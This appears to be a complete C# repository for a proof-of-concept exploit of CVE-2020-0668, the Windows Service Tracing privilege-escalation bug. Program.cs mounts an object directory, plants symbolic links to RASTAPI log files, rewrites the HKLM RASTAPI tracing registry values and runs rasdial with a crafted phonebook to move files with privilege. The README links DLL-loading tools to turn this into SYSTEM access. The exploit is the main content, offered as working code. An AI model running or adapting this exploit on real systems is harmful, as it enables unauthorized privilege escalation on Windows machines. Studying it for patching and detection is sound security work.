├── .gitignore
├── App.config
├── CVE-2020-0668.csproj
├── CVE-2020-0668.sln
├── Program.cs
├── Properties
├── AssemblyInfo.cs
├── Resources.Designer.cs
└── Resources.resx
├── README.md
├── Resources
└── phonebook.txt
├── packages.config
└── poc.png
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Aa][Rr][Mm]/
27 | [Aa][Rr][Mm]64/
28 | bld/
29 | [Bb]in/
30 | [Oo]bj/
31 | [Ll]og/
32 | [Ll]ogs/
33 |
34 | # Visual Studio 2015/2017 cache/options directory
35 | .vs/
36 | # Uncomment if you have tasks that create the project's static files in wwwroot
37 | #wwwroot/
38 |
39 | # Visual Studio 2017 auto generated files
40 | Generated\ Files/
41 |
42 | # MSTest test Results
43 | [Tt]est[Rr]esult*/
44 | [Bb]uild[Ll]og.*
45 |
46 | # NUnit
47 | *.VisualState.xml
48 | TestResult.xml
49 | nunit-*.xml
50 |
51 | # Build Results of an ATL Project
52 | [Dd]ebugPS/
53 | [Rr]eleasePS/
54 | dlldata.c
55 |
56 | # Benchmark Results
57 | BenchmarkDotNet.Artifacts/
58 |
59 | # .NET Core
60 | project.lock.json
61 | project.fragment.lock.json
62 | artifacts/
63 |
64 | # StyleCop
65 | StyleCopReport.xml
66 |
67 | # Files built by Visual Studio
68 | *_i.c
69 | *_p.c
70 | *_h.h
71 | *.ilk
72 | *.meta
73 | *.obj
74 | *.iobj
75 | *.pch
76 | *.pdb
77 | *.ipdb
78 | *.pgc
79 | *.pgd
80 | *.rsp
81 | *.sbr
82 | *.tlb
83 | *.tli
84 | *.tlh
85 | *.tmp
86 | *.tmp_proj
87 | *_wpftmp.csproj
88 | *.log
89 | *.vspscc
90 | *.vssscc
91 | .builds
92 | *.pidb
93 | *.svclog
94 | *.scc
95 |
96 | # Chutzpah Test files
97 | _Chutzpah*
98 |
99 | # Visual C++ cache files
100 | ipch/
101 | *.aps
102 | *.ncb
103 | *.opendb
104 | *.opensdf
105 | *.sdf
106 | *.cachefile
107 | *.VC.db
108 | *.VC.VC.opendb
109 |
110 | # Visual Studio profiler
111 | *.psess
112 | *.vsp
113 | *.vspx
114 | *.sap
115 |
116 | # Visual Studio Trace Files
117 | *.e2e
118 |
119 | # TFS 2012 Local Workspace
120 | $tf/
121 |
122 | # Guidance Automation Toolkit
123 | *.gpState
124 |
125 | # ReSharper is a .NET coding add-in
126 | _ReSharper*/
127 | *.[Rr]e[Ss]harper
128 | *.DotSettings.user
129 |
130 | # TeamCity is a build add-in
131 | _TeamCity*
132 |
133 | # DotCover is a Code Coverage Tool
134 | *.dotCover
135 |
136 | # AxoCover is a Code Coverage Tool
137 | .axoCover/*
138 | !.axoCover/settings.json
139 |
140 | # Visual Studio code coverage results
141 | *.coverage
142 | *.coveragexml
143 |
144 | # NCrunch
145 | _NCrunch_*
146 | .*crunch*.local.xml
147 | nCrunchTemp_*
148 |
149 | # MightyMoose
150 | *.mm.*
151 | AutoTest.Net/
152 |
153 | # Web workbench (sass)
154 | .sass-cache/
155 |
156 | # Installshield output folder
157 | [Ee]xpress/
158 |
159 | # DocProject is a documentation generator add-in
160 | DocProject/buildhelp/
161 | DocProject/Help/*.HxT
162 | DocProject/Help/*.HxC
163 | DocProject/Help/*.hhc
164 | DocProject/Help/*.hhk
165 | DocProject/Help/*.hhp
166 | DocProject/Help/Html2
167 | DocProject/Help/html
168 |
169 | # Click-Once directory
170 | publish/
171 |
172 | # Publish Web Output
173 | *.[Pp]ublish.xml
174 | *.azurePubxml
175 | # Note: Comment the next line if you want to checkin your web deploy settings,
176 | # but database connection strings (with potential passwords) will be unencrypted
177 | *.pubxml
178 | *.publishproj
179 |
180 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
181 | # checkin your Azure Web App publish settings, but sensitive information contained
182 | # in these scripts will be unencrypted
183 | PublishScripts/
184 |
185 | # NuGet Packages
186 | *.nupkg
187 | # NuGet Symbol Packages
188 | *.snupkg
189 | # The packages folder can be ignored because of Package Restore
190 | **/[Pp]ackages/*
191 | # except build/, which is used as an MSBuild target.
192 | !**/[Pp]ackages/build/
193 | # Uncomment if necessary however generally it will be regenerated when needed
194 | #!**/[Pp]ackages/repositories.config
195 | # NuGet v3's project.json files produces more ignorable files
196 | *.nuget.props
197 | *.nuget.targets
198 |
199 | # Microsoft Azure Build Output
200 | csx/
201 | *.build.csdef
202 |
203 | # Microsoft Azure Emulator
204 | ecf/
205 | rcf/
206 |
207 | # Windows Store app package directories and files
208 | AppPackages/
209 | BundleArtifacts/
210 | Package.StoreAssociation.xml
211 | _pkginfo.txt
212 | *.appx
213 | *.appxbundle
214 | *.appxupload
215 |
216 | # Visual Studio cache files
217 | # files ending in .cache can be ignored
218 | *.[Cc]ache
219 | # but keep track of directories ending in .cache
220 | !?*.[Cc]ache/
221 |
222 | # Others
223 | ClientBin/
224 | ~$*
225 | *~
226 | *.dbmdl
227 | *.dbproj.schemaview
228 | *.jfm
229 | *.pfx
230 | *.publishsettings
231 | orleans.codegen.cs
232 |
233 | # Including strong name files can present a security risk
234 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
235 | #*.snk
236 |
237 | # Since there are multiple workflows, uncomment next line to ignore bower_components
238 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
239 | #bower_components/
240 |
241 | # RIA/Silverlight projects
242 | Generated_Code/
243 |
244 | # Backup & report files from converting an old project file
245 | # to a newer Visual Studio version. Backup files are not needed,
246 | # because we have git ;-)
247 | _UpgradeReport_Files/
248 | Backup*/
249 | UpgradeLog*.XML
250 | UpgradeLog*.htm
251 | ServiceFabricBackup/
252 | *.rptproj.bak
253 |
254 | # SQL Server files
255 | *.mdf
256 | *.ldf
257 | *.ndf
258 |
259 | # Business Intelligence projects
260 | *.rdl.data
261 | *.bim.layout
262 | *.bim_*.settings
263 | *.rptproj.rsuser
264 | *- [Bb]ackup.rdl
265 | *- [Bb]ackup ([0-9]).rdl
266 | *- [Bb]ackup ([0-9][0-9]).rdl
267 |
268 | # Microsoft Fakes
269 | FakesAssemblies/
270 |
271 | # GhostDoc plugin setting file
272 | *.GhostDoc.xml
273 |
274 | # Node.js Tools for Visual Studio
275 | .ntvs_analysis.dat
276 | node_modules/
277 |
278 | # Visual Studio 6 build log
279 | *.plg
280 |
281 | # Visual Studio 6 workspace options file
282 | *.opt
283 |
284 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
285 | *.vbw
286 |
287 | # Visual Studio LightSwitch build output
288 | **/*.HTMLClient/GeneratedArtifacts
289 | **/*.DesktopClient/GeneratedArtifacts
290 | **/*.DesktopClient/ModelManifest.xml
291 | **/*.Server/GeneratedArtifacts
292 | **/*.Server/ModelManifest.xml
293 | _Pvt_Extensions
294 |
295 | # Paket dependency manager
296 | .paket/paket.exe
297 | paket-files/
298 |
299 | # FAKE - F# Make
300 | .fake/
301 |
302 | # CodeRush personal settings
303 | .cr/personal
304 |
305 | # Python Tools for Visual Studio (PTVS)
306 | __pycache__/
307 | *.pyc
308 |
309 | # Cake - Uncomment if you are using it
310 | # tools/**
311 | # !tools/packages.config
312 |
313 | # Tabs Studio
314 | *.tss
315 |
316 | # Telerik's JustMock configuration file
317 | *.jmconfig
318 |
319 | # BizTalk build output
320 | *.btp.cs
321 | *.btm.cs
322 | *.odx.cs
323 | *.xsd.cs
324 |
325 | # OpenCover UI analysis results
326 | OpenCover/
327 |
328 | # Azure Stream Analytics local run output
329 | ASALocalRun/
330 |
331 | # MSBuild Binary and Structured Log
332 | *.binlog
333 |
334 | # NVidia Nsight GPU debugger configuration file
335 | *.nvuser
336 |
337 | # MFractors (Xamarin productivity tool) working folder
338 | .mfractor/
339 |
340 | # Local History for Visual Studio
341 | .localhistory/
342 |
343 | # BeatPulse healthcheck temp database
344 | healthchecksdb
345 |
346 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
347 | MigrationBackup/
348 |
349 | # Ionide (cross platform F# VS Code tools) working folder
350 | .ionide/
351 |
--------------------------------------------------------------------------------
/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CVE-2020-0668.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {1B4C5EC1-2845-40FD-A173-62C450F12EA5}
8 | Exe
9 | CVE_2020_0668
10 | CVE-2020-0668
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 |
37 | packages\NtApiDotNet.1.1.27\lib\net45\NtApiDotNet.dll
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 | True
53 | True
54 | Resources.resx
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 | ResXFileCodeGenerator
64 | Resources.Designer.cs
65 |
66 |
67 |
68 |
69 |
70 |
71 |
--------------------------------------------------------------------------------
/CVE-2020-0668.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29806.167
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "CVE-2020-0668", "CVE-2020-0668.csproj", "{1B4C5EC1-2845-40FD-A173-62C450F12EA5}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {1B4C5EC1-2845-40FD-A173-62C450F12EA5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {1B4C5EC1-2845-40FD-A173-62C450F12EA5}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {1B4C5EC1-2845-40FD-A173-62C450F12EA5}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {1B4C5EC1-2845-40FD-A173-62C450F12EA5}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {D31765F2-0CE6-4B07-9D34-58301467BB88}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Program.cs:
--------------------------------------------------------------------------------
1 | using NtApiDotNet;
2 | using System;
3 | using System.Threading;
4 | using System.IO;
5 | using Microsoft.Win32;
6 | using System.Diagnostics;
7 |
8 | //TODO actually get shells using https://github.com/itm4n/UsoDllLoader OR https://github.com/xct/diaghub
9 |
10 | namespace CVE_2020_0668
11 | {
12 | class Program
13 | {
14 | static void Main(string[] args)
15 | {
16 | if (args.Length != 2)
17 | {
18 | Console.WriteLine("Use CVE-2020-0668 to perform an arbitrary privileged file move operation.");
19 | Console.WriteLine($"Usage: inFilePath outFilePath");
20 | return;
21 | }
22 | String inDLLPath = args[0];
23 | String outDllPath = args[1];
24 |
25 | if (!File.Exists(inDLLPath))
26 | {
27 | Console.WriteLine($@"[!] Cannot find {inDLLPath}!");
28 | return;
29 | }
30 | Console.WriteLine(String.Format("[+] Moving {0} to {1}", inDLLPath, outDllPath));
31 |
32 | String tempDirectory = GetTemporaryDirectory();
33 | const string ObjectDirectory = @"\RPC Control";
34 |
35 | Console.WriteLine($@"[+] Mounting {ObjectDirectory} onto {tempDirectory}");
36 | string tempDirectoryNt = NtFileUtils.DosFileNameToNt(tempDirectory);
37 | NtFile.CreateMountPoint(tempDirectoryNt, ObjectDirectory, "");
38 |
39 | Console.WriteLine("[+] Creating symbol links");
40 |
41 |
42 | var logFileSymlnk = NtSymbolicLink.Create($@"{ObjectDirectory}\RASTAPI.LOG", $@"\??\{inDLLPath}");
43 | var oldFileSymlnk = NtSymbolicLink.Create($@"{ObjectDirectory}\RASTAPI.OLD", $@"\??\{outDllPath}");
44 |
45 | Console.WriteLine(@"[+] Updating the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASPLAP configuration.");
46 | Console.WriteLine(@"[+] Sleeping for 5 seconds so the changes take effect");
47 | UpdateRASTAPITracingConfig(tempDirectory, true, 0x1000);
48 | Thread.Sleep(5000); // might have to sleep for the update to take effect
49 |
50 |
51 | string phonebookPath = Path.Combine(Path.GetTempPath(), Guid.NewGuid().ToString() + ".pbk");
52 | Console.WriteLine($"[+] Writing phonebook file to {phonebookPath}");
53 | File.WriteAllText(phonebookPath, CVE_2020_0668.Properties.Resources.Phonebook);
54 |
55 | using (Process p = new Process())
56 | {
57 | p.StartInfo.FileName = "rasdial";
58 | p.StartInfo.Arguments = $@"VPNTEST test test /PHONEBOOK:{phonebookPath}";
59 | p.StartInfo.CreateNoWindow = true;
60 | p.StartInfo.UseShellExecute = false;
61 | p.Start();
62 | p.WaitForExit();
63 | }
64 |
65 | Console.WriteLine("[+] Cleaning up");
66 | File.Delete(phonebookPath);
67 | Directory.Delete(tempDirectory, true);
68 | logFileSymlnk.Close();
69 | oldFileSymlnk.Close();
70 | UpdateRASTAPITracingConfig(@"%windir%\tracing", false, 0x100000); //those are the default values
71 |
72 |
73 | Console.WriteLine("[+] Done!");
74 | }
75 |
76 | static public void UpdateRASTAPITracingConfig(string logDirectory, bool enabled, int logSize)
77 | {
78 | using (RegistryKey HKLocalMachine = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64))
79 | {
80 | using (RegistryKey key = HKLocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Tracing\RASTAPI", true))
81 | {
82 | if (key != null)
83 | {
84 | key.SetValue(@"FileDirectory", logDirectory);
85 | key.SetValue(@"MaxFileSize", logSize);
86 | key.SetValue(@"EnableFileTracing", enabled ? 1 : 0);
87 | }
88 | else
89 | {
90 | Console.WriteLine(@"[!] Failed to open HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI with write access!");
91 | System.Environment.Exit(1);
92 | }
93 | }
94 | }
95 | }
96 | static public string GetTemporaryDirectory()
97 | {
98 | string tempDirectory = Path.Combine(Path.GetTempPath(), Path.GetRandomFileName());
99 | Directory.CreateDirectory(tempDirectory);
100 | return tempDirectory;
101 | }
102 |
103 | }
104 | }
105 |
--------------------------------------------------------------------------------
/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("CVE-2020-0668")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("CVE-2020-0668")]
13 | [assembly: AssemblyCopyright("Copyright © 2020")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("1b4c5ec1-2845-40fd-a173-62c450f12ea5")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Properties/Resources.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:4.0.30319.42000
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | namespace CVE_2020_0668.Properties {
12 | using System;
13 |
14 |
15 | ///
16 | /// A strongly-typed resource class, for looking up localized strings, etc.
17 | ///
18 | // This class was auto-generated by the StronglyTypedResourceBuilder
19 | // class via a tool like ResGen or Visual Studio.
20 | // To add or remove a member, edit your .ResX file then rerun ResGen
21 | // with the /str option, or rebuild your VS project.
22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
25 | internal class Resources {
26 |
27 | private static global::System.Resources.ResourceManager resourceMan;
28 |
29 | private static global::System.Globalization.CultureInfo resourceCulture;
30 |
31 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
32 | internal Resources() {
33 | }
34 |
35 | ///
36 | /// Returns the cached ResourceManager instance used by this class.
37 | ///
38 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
39 | internal static global::System.Resources.ResourceManager ResourceManager {
40 | get {
41 | if (object.ReferenceEquals(resourceMan, null)) {
42 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("CVE_2020_0668.Properties.Resources", typeof(Resources).Assembly);
43 | resourceMan = temp;
44 | }
45 | return resourceMan;
46 | }
47 | }
48 |
49 | ///
50 | /// Overrides the current thread's CurrentUICulture property for all
51 | /// resource lookups using this strongly typed resource class.
52 | ///
53 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
54 | internal static global::System.Globalization.CultureInfo Culture {
55 | get {
56 | return resourceCulture;
57 | }
58 | set {
59 | resourceCulture = value;
60 | }
61 | }
62 |
63 | ///
64 | /// Looks up a localized string similar to [VPNTEST]
65 | ///Encoding=1
66 | ///PBVersion=1
67 | ///Type=2
68 | ///AutoLogon=1
69 | ///UseRasCredentials=1
70 | ///LowDateTime=-1345834320
71 | ///HighDateTime=30248544
72 | ///DialParamsUID=849441
73 | ///Guid=174463CE6AAFD4458FC57A466A95B787
74 | ///VpnStrategy=1
75 | ///ExcludedProtocols=0
76 | ///LcpExtensions=1
77 | ///DataEncryption=8
78 | ///SwCompression=0
79 | ///NegotiateMultilinkAlways=0
80 | ///SkipDoubleDialDialog=0
81 | ///DialMode=0
82 | ///OverridePref=15
83 | ///RedialAttempts=3
84 | ///RedialSeconds=60
85 | ///IdleDisconnectSeconds=0
86 | ///RedialOnLinkFailure=1
87 | ///CallbackMode=0
88 | ///CustomDialDll=
89 | ///CustomDialFunc=
90 | ///CustomRasDialDll=
91 | ///Forc [rest of string was truncated]";.
92 | ///
93 | internal static string Phonebook {
94 | get {
95 | return ResourceManager.GetString("Phonebook", resourceCulture);
96 | }
97 | }
98 | }
99 | }
100 |
--------------------------------------------------------------------------------
/Properties/Resources.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
121 |
122 | ..\Resources\phonebook.txt;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;Windows-1252
123 |
124 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-0668
2 | Use CVE-2020-0668 to perform an arbitrary privileged file move operation.
3 |
4 | Use https://github.com/itm4n/UsoDllLoader (Windows >= 1903) OR https://github.com/xct/diaghub (Windows < 1903) for privilege escalation.
5 |
6 | # Demo
7 | 
8 |
9 | Links & Resources
10 | - https://itm4n.github.io/cve-2020-0668-windows-service-tracing-eop/
11 | - https://itm4n.github.io/usodllloader-part1/
12 | - https://itm4n.github.io/usodllloader-part2/
13 | - https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html
14 |
--------------------------------------------------------------------------------
/Resources/phonebook.txt:
--------------------------------------------------------------------------------
1 | [VPNTEST]
2 | Encoding=1
3 | PBVersion=1
4 | Type=2
5 | AutoLogon=1
6 | UseRasCredentials=1
7 | LowDateTime=-1345834320
8 | HighDateTime=30248544
9 | DialParamsUID=849441
10 | Guid=174463CE6AAFD4458FC57A466A95B787
11 | VpnStrategy=1
12 | ExcludedProtocols=0
13 | LcpExtensions=1
14 | DataEncryption=8
15 | SwCompression=0
16 | NegotiateMultilinkAlways=0
17 | SkipDoubleDialDialog=0
18 | DialMode=0
19 | OverridePref=15
20 | RedialAttempts=3
21 | RedialSeconds=60
22 | IdleDisconnectSeconds=0
23 | RedialOnLinkFailure=1
24 | CallbackMode=0
25 | CustomDialDll=
26 | CustomDialFunc=
27 | CustomRasDialDll=
28 | ForceSecureCompartment=0
29 | DisableIKENameEkuCheck=0
30 | AuthenticateServer=0
31 | ShareMsFilePrint=1
32 | BindMsNetClient=1
33 | SharedPhoneNumbers=0
34 | GlobalDeviceSettings=0
35 | PrerequisiteEntry=
36 | PrerequisitePbk=
37 | PreferredPort=VPN3-0
38 | PreferredDevice=WAN Miniport (PPTP)
39 | PreferredBps=0
40 | PreferredHwFlow=1
41 | PreferredProtocol=1
42 | PreferredCompression=1
43 | PreferredSpeaker=1
44 | PreferredMdmProtocol=0
45 | PreviewUserPw=1
46 | PreviewDomain=1
47 | PreviewPhoneNumber=0
48 | ShowDialingProgress=1
49 | ShowMonitorIconInTaskBar=1
50 | CustomAuthKey=0
51 | AuthRestrictions=544
52 | IpPrioritizeRemote=1
53 | IpInterfaceMetric=0
54 | IpHeaderCompression=0
55 | IpAddress=0.0.0.0
56 | IpDnsAddress=0.0.0.0
57 | IpDns2Address=0.0.0.0
58 | IpWinsAddress=0.0.0.0
59 | IpWins2Address=0.0.0.0
60 | IpAssign=1
61 | IpNameAssign=1
62 | IpDnsFlags=0
63 | IpNBTFlags=1
64 | TcpWindowSize=0
65 | UseFlags=2
66 | IpSecFlags=0
67 | IpDnsSuffix=
68 | Ipv6Assign=1
69 | Ipv6Address=::
70 | Ipv6PrefixLength=0
71 | Ipv6PrioritizeRemote=1
72 | Ipv6InterfaceMetric=0
73 | Ipv6NameAssign=1
74 | Ipv6DnsAddress=::
75 | Ipv6Dns2Address=::
76 | Ipv6Prefix=0000000000000000
77 | Ipv6InterfaceId=0000000000000000
78 | DisableClassBasedDefaultRoute=0
79 | DisableMobility=0
80 | NetworkOutageTime=0
81 | ProvisionType=0
82 | PreSharedKey=
83 |
84 | NETCOMPONENTS=
85 | ms_msclient=1
86 | ms_server=1
87 |
88 | MEDIA=rastapi
89 | Port=VPN3-0
90 | Device=WAN Miniport (PPTP)
91 |
92 | DEVICE=vpn
93 | PhoneNumber=127.0.0.1
94 | AreaCode=
95 | CountryCode=0
96 | CountryID=0
97 | UseDialingRules=0
98 | Comment=
99 | FriendlyName=
100 | LastSelectedPhone=0
101 | PromoteAlternates=0
102 | TryNextAlternateOnFail=1
103 |
104 |
--------------------------------------------------------------------------------
/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/poc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RedCursorSecurityConsulting/CVE-2020-0668/02c46d012ddb207e6f63e4916ba4b443d5e3857c/poc.png
--------------------------------------------------------------------------------